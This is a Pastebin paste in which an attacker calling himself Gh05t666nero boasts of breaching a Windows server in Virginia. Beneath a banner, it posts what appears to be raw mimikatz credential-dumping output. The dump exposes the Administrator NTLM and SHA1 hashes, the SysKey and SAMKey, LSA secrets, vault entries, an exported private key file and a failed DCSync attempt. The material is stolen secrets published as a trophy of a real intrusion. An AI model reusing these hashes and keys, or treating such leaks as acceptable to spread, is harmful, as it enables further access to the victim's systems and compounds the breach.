Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- USA Virgina Attacked RMS by Gh05t666nero
- ___ _ __ ___ _ __ __ __
- / __| |_ / \| __| |_ / / / / / / _ _ ___ _ _ ___
- | (_ | ' \ () |__ \ _/ _ \/ _ \/ _ \ ' \/ -_) '_/ _ \
- \___|_||_\__/|___/\__\___/\___/\___/_||_\___|_| \___/
- # Breacher : Gh05t666nero
- # Greet'z : Indoghostsec Family
- # Server : 172.31.29.189»2001:0:34f1:8072:1424:1062:53e0:e242
- # Hostname : EC2AMAZ-GFUR9Q3
- # Attacking: 2020-11-26 | 14:00
- #-------------------------------------------------
- Special Thanks to: Gh05t666include
- Authentication Id : 0 ; 990954 (00000000:000f1eea)
- Session : RemoteInteractive from 2
- User Name : Administrator
- Domain : EC2AMAZ-GFUR9Q3
- Logon Server : EC2AMAZ-GFUR9Q3
- Logon Time : 11/26/2020 4:04:16 AM
- SID : S-1-5-21-240594365-2623422017-1024957230-500
- msv :
- [00000003] Primary
- * Username : Administrator
- * Domain : EC2AMAZ-GFUR9Q3
- * NTLM : afed7dc2d73c05cafe97cb518680ef41
- * SHA1 : 2b1fd0699d127a8cfe44118ac3f2c2d7995b0f67
- tspkg :
- wdigest :
- * Username : Administrator
- * Domain : EC2AMAZ-GFUR9Q3
- * Password : (null)
- kerberos :
- * Username : Administrator
- * Domain : EC2AMAZ-GFUR9Q3
- * Password : (null)
- ssp :
- credman :
- Authentication Id : 0 ; 930845 (00000000:000e341d)
- Session : Interactive from 2
- User Name : DWM-2
- Domain : Window Manager
- Logon Server : (null)
- Logon Time : 11/26/2020 4:04:11 AM
- SID : S-1-5-90-0-2
- msv :
- tspkg :
- wdigest :
- * Username : EC2AMAZ-GFUR9Q3$
- * Domain : WORKGROUP
- * Password : (null)
- kerberos :
- ssp :
- credman :
- Authentication Id : 0 ; 62557 (00000000:0000f45d)
- Session : Interactive from 1
- User Name : DWM-1
- Domain : Window Manager
- Logon Server : (null)
- Logon Time : 11/26/2020 3:51:29 AM
- SID : S-1-5-90-0-1
- msv :
- tspkg :
- wdigest :
- * Username : EC2AMAZ-GFUR9Q3$
- * Domain : WORKGROUP
- * Password : (null)
- kerberos :
- ssp :
- credman :
- Authentication Id : 0 ; 996 (00000000:000003e4)
- Session : Service from 0
- User Name : EC2AMAZ-GFUR9Q3$
- Domain : WORKGROUP
- Logon Server : (null)
- Logon Time : 11/26/2020 3:51:28 AM
- SID : S-1-5-20
- msv :
- tspkg :
- wdigest :
- * Username : EC2AMAZ-GFUR9Q3$
- * Domain : WORKGROUP
- * Password : (null)
- kerberos :
- * Username : ec2amaz-gfur9q3$
- * Domain : WORKGROUP
- * Password : (null)
- ssp :
- credman :
- Authentication Id : 0 ; 25012 (00000000:000061b4)
- Session : UndefinedLogonType from 0
- User Name : (null)
- Domain : (null)
- Logon Server : (null)
- Logon Time : 11/26/2020 3:51:27 AM
- SID :
- msv :
- tspkg :
- wdigest :
- kerberos :
- ssp :
- credman :
- Authentication Id : 0 ; 929984 (00000000:000e30c0)
- Session : Interactive from 2
- User Name : DWM-2
- Domain : Window Manager
- Logon Server : (null)
- Logon Time : 11/26/2020 4:04:11 AM
- SID : S-1-5-90-0-2
- msv :
- tspkg :
- wdigest :
- * Username : EC2AMAZ-GFUR9Q3$
- * Domain : WORKGROUP
- * Password : (null)
- kerberos :
- ssp :
- credman :
- Authentication Id : 0 ; 62540 (00000000:0000f44c)
- Session : Interactive from 1
- User Name : DWM-1
- Domain : Window Manager
- Logon Server : (null)
- Logon Time : 11/26/2020 3:51:29 AM
- SID : S-1-5-90-0-1
- msv :
- tspkg :
- wdigest :
- * Username : EC2AMAZ-GFUR9Q3$
- * Domain : WORKGROUP
- * Password : (null)
- kerberos :
- ssp :
- credman :
- Authentication Id : 0 ; 997 (00000000:000003e5)
- Session : Service from 0
- User Name : LOCAL SERVICE
- Domain : NT AUTHORITY
- Logon Server : (null)
- Logon Time : 11/26/2020 3:51:29 AM
- SID : S-1-5-19
- msv :
- tspkg :
- wdigest :
- * Username : (null)
- * Domain : (null)
- * Password : (null)
- kerberos :
- * Username : (null)
- * Domain : (null)
- * Password : (null)
- ssp :
- credman :
- Authentication Id : 0 ; 999 (00000000:000003e7)
- Session : UndefinedLogonType from 0
- User Name : EC2AMAZ-GFUR9Q3$
- Domain : WORKGROUP
- Logon Server : (null)
- Logon Time : 11/26/2020 3:51:27 AM
- SID : S-1-5-18
- msv :
- tspkg :
- wdigest :
- * Username : EC2AMAZ-GFUR9Q3$
- * Domain : WORKGROUP
- * Password : (null)
- kerberos :
- * Username : ec2amaz-gfur9q3$
- * Domain : WORKGROUP
- * Password : (null)
- ssp :
- credman :
- Authentication Id : 0 ; 990954 (00000000:000f1eea)
- Session : RemoteInteractive from 2
- User Name : Administrator
- Domain : EC2AMAZ-GFUR9Q3
- Logon Server : EC2AMAZ-GFUR9Q3
- Logon Time : 11/26/2020 4:04:16 AM
- SID : S-1-5-21-240594365-2623422017-1024957230-500
- * Username : Administrator
- * Domain : EC2AMAZ-GFUR9Q3
- * Password : (null)
- Group 0 - Ticket Granting Service
- Group 1 - Client Ticket ?
- Group 2 - Ticket Granting Ticket
- Authentication Id : 0 ; 996 (00000000:000003e4)
- Session : Service from 0
- User Name : EC2AMAZ-GFUR9Q3$
- Domain : WORKGROUP
- Logon Server : (null)
- Logon Time : 11/26/2020 3:51:28 AM
- SID : S-1-5-20
- * Username : ec2amaz-gfur9q3$
- * Domain : WORKGROUP
- * Password : (null)
- Group 0 - Ticket Granting Service
- Group 1 - Client Ticket ?
- Group 2 - Ticket Granting Ticket
- Authentication Id : 0 ; 997 (00000000:000003e5)
- Session : Service from 0
- User Name : LOCAL SERVICE
- Domain : NT AUTHORITY
- Logon Server : (null)
- Logon Time : 11/26/2020 3:51:29 AM
- SID : S-1-5-19
- * Username : (null)
- * Domain : (null)
- * Password : (null)
- Group 0 - Ticket Granting Service
- Group 1 - Client Ticket ?
- Group 2 - Ticket Granting Ticket
- Authentication Id : 0 ; 999 (00000000:000003e7)
- Session : UndefinedLogonType from 0
- User Name : EC2AMAZ-GFUR9Q3$
- Domain : WORKGROUP
- Logon Server : (null)
- Logon Time : 11/26/2020 3:51:27 AM
- SID : S-1-5-18
- * Username : ec2amaz-gfur9q3$
- * Domain : WORKGROUP
- * Password : (null)
- Group 0 - Ticket Granting Service
- Group 1 - Client Ticket ?
- Group 2 - Ticket Granting Ticket
- * System Store : 'CURRENT_USER' (0x00010000)
- * Store : 'My'
- * System Store : 'CERT_SYSTEM_STORE_LOCAL_MACHINE' (0x00020000)
- * Store : 'My'
- * Store : 'user'
- * Provider : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0')
- * Provider type : 'PROV_RSA_FULL' (1)
- * CNG Provider : 'Microsoft Software Key Storage Provider'
- * Store : 'machine'
- * Provider : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0')
- * Provider type : 'PROV_RSA_FULL' (1)
- * CNG Provider : 'Microsoft Software Key Storage Provider'
- CryptoAPI keys :
- 0. TSSecKeySet1
- f686aace6942fb7f7ceb231212eef4a4_20076372-8aa8-4127-baae-0a79b306fba8
- Type : AT_KEYEXCHANGE (0x00000001)
- |Provider name : Microsoft Enhanced Cryptographic Provider v1.0
- |Key Container : TSSecKeySet1
- |Unique name : f686aace6942fb7f7ceb231212eef4a4_20076372-8aa8-4127-baae-0a79b306fba8
- |Implementation: CRYPT_IMPL_SOFTWARE ;
- Algorithm : CALG_RSA_KEYX
- Key size : 2048 (0x00000800)
- Key permissions: 0000003b ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
- Exportable key : NO
- Private export : OK - 'machine_capi_0_TSSecKeySet1.keyx.rsa.pvk
- TargetName : MicrosoftAccount:target=SSO_POP_Device / <NULL>
- UserName : 02gvirolifxu
- Comment : Microsoft_WindowsLive:SerializedMaterial:5824
- Type : 6 - domain_extended
- Persist : 1 - session
- Flags : 00000000
- Credential :
- Attributes : 23
- TargetName : WindowsLive:target=virtualapp/didlogical / <NULL>
- UserName : 02gvirolifxu
- Comment : PersistedCredential
- Type : 1 - generic
- Persist : 2 - local_machine
- Flags : 00000000
- Credential :
- Attributes : 32
- Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
- Name : Web Credentials
- Path : C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
- Items (0)
- Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29}
- Name : Windows Credentials
- Path : C:\Users\Administrator\AppData\Local\Microsoft\Vault
- Items (1)
- 0. (null)
- Type : {3c886ff3-2669-4aa2-a8fb-3f6759a77548}
- LastWritten : 11/26/2020 4:04:41 AM
- Flags : 00000000
- Ressource : [STRING] MicrosoftAccount:target=SSO_POP_Device
- Identity : [STRING] 02gvirolifxu
- Authenticator :
- PackageSid :
- *Authenticator* : [BYTE*]
- *** Domain Extended ***
- TargetName : WindowsLive:target=virtualapp/didlogical / <NULL>
- UserName : 02iyqjbfduci
- Comment : PersistedCredential
- Type : 1 - generic
- Persist : 2 - local_machine
- Flags : 00000000
- Credential :
- Attributes : 32
- Domain : EC2AMAZ-GFUR9Q3
- SysKey : 98db12300575d3dd3f7e8b5a9556d457
- Local SID : S-1-5-21-240594365-2623422017-1024957230
- SAMKey : f18676693d059290dac03bf51ff90bcd
- RID : 000001f4 (500)
- User : Administrator
- Hash NTLM: afed7dc2d73c05cafe97cb518680ef41
- RID : 000001f5 (501)
- User : Guest
- RID : 000001f7 (503)
- User : DefaultAccount
- Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
- Name : Web Credentials
- Path : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
- Items (0)
- Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29}
- Name : Windows Credentials
- Path : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault
- Items (0)
- Domain : EC2AMAZ-GFUR9Q3
- SysKey : 98db12300575d3dd3f7e8b5a9556d457
- Local name : EC2AMAZ-GFUR9Q3 ( S-1-5-21-240594365-2623422017-1024957230 )
- Domain name : WORKGROUP
- Policy subsystem is : 1.14
- LSA Key(s) : 1, default {6acde6d5-f708-3e4c-8002-864756581200}
- [00] {6acde6d5-f708-3e4c-8002-864756581200} fbcc62a31d2d9199118daeaa916eea288bc7d1ee57eff17e7754442c4646c77d
- Secret : DPAPI_SYSTEM
- cur/hex : 01 00 00 00 80 9a b7 3b 6e ff 41 ae 98 6e 7c 66 f5 24 af c6 b0 71 f2 60 b7 46 d9 aa 2a 25 8d 23 8d d9 dd 5f b2 cf b0 d9 8f 54 1d 0c
- full: 809ab73b6eff41ae986e7c66f524afc6b071f260b746d9aa2a258d238dd9dd5fb2cfb0d98f541d0c
- m/u : 809ab73b6eff41ae986e7c66f524afc6b071f260 / b746d9aa2a258d238dd9dd5fb2cfb0d98f541d0c
- old/hex : 01 00 00 00 b6 e7 df 80 ea d7 01 e8 23 e1 87 b3 dc 57 2f 27 33 46 e9 68 b9 95 53 60 4b f5 b9 e0 ee 5e 8a 49 59 96 ad 36 a7 8e ce a9
- full: b6e7df80ead701e823e187b3dc572f273346e968b99553604bf5b9e0ee5e8a495996ad36a78ecea9
- m/u : b6e7df80ead701e823e187b3dc572f273346e968 / b99553604bf5b9e0ee5e8a495996ad36a78ecea9
- Secret : NL$KM
- cur/hex : 2e 74 ed 55 62 cb 0c 23 83 3d c6 56 51 ce b2 93 63 bc 5f c9 59 8b 25 db 1f fc f9 a2 26 50 31 60 c4 67 c4 47 3b ea d7 01 86 9b 67 31 70 f9 30 a1 49 99 f2 29 6d 19 85 d4 f2 01 be c0 65 26 19 20
- old/hex : 2e 74 ed 55 62 cb 0c 23 83 3d c6 56 51 ce b2 93 63 bc 5f c9 59 8b 25 db 1f fc f9 a2 26 50 31 60 c4 67 c4 47 3b ea d7 01 86 9b 67 31 70 f9 30 a1 49 99 f2 29 6d 19 85 d4 f2 01 be c0 65 26 19 20
- Domain : EC2AMAZ-GFUR9Q3
- SysKey : 98db12300575d3dd3f7e8b5a9556d457
- Local name : EC2AMAZ-GFUR9Q3 ( S-1-5-21-240594365-2623422017-1024957230 )
- Domain name : WORKGROUP
- Policy subsystem is : 1.14
- LSA Key(s) : 1, default {6acde6d5-f708-3e4c-8002-864756581200}
- [00] {6acde6d5-f708-3e4c-8002-864756581200} fbcc62a31d2d9199118daeaa916eea288bc7d1ee57eff17e7754442c4646c77d
- * Iteration is set to default (10240)
- [DC] 'lab.local' will be the domain
- ERROR kull_m_net_getDC ; DsGetDcName: 1355
- ERROR kuhl_m_lsadump_dcsync ; Domain Controller not present
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement